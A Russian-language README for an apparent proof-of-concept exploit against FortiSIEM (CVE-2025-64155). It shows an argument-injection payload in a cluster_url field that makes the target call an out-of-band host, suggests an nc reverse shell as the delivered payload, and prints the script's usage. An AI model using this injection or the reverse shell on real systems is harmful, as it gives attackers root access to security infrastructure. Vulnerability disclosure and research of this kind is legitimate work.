
CVE-2025-64155: Fortinet FortiSIEM — инъекция аргументов, приводящая к удалённому выполнению кода
Концептуальный эксплойт для Fortinet FortiSIEM, использующий внедрение аргументов для записи файла и получения выполнения кода с правами root
Подробный анализ здесь: Horizon3.ai — CVE-2025-64155: Три года удаленного получения прав root в Fortinet FortiSIEM
Эксплуатация этой проблемы для перезаписи файлов приложения, скорее всего, приведет к нестабильности системы. Используйте с осторожностью. Проверки можно выполнять безвредно, изменив cluster_url на: <cluster_url>http://127.0.0.1:80 --next http://<INTERACTSH_URL></cluster_url>
serve.py на желаемый (например, nc reverse shell)serve.pyCVE-2025-64155.py% python3 CVE-2025-64155.py -h
usage: CVE-2025-64155.py [-h] -t TARGET [-p PORT]
options:
-h, --help show this help message and exit
-t TARGET, --target TARGET
The IP address of the target
-p PORT, --port PORT The port of the Phoenix Monitor service
Это программное обеспечение создано исключительно для академических исследований и разработки эффективных защитных методов и не предназначено для атаки на системы без явного разрешения. Сопровождающие проекта не несут ответственности за неправильное использование программного обеспечения. Используйте ответственно.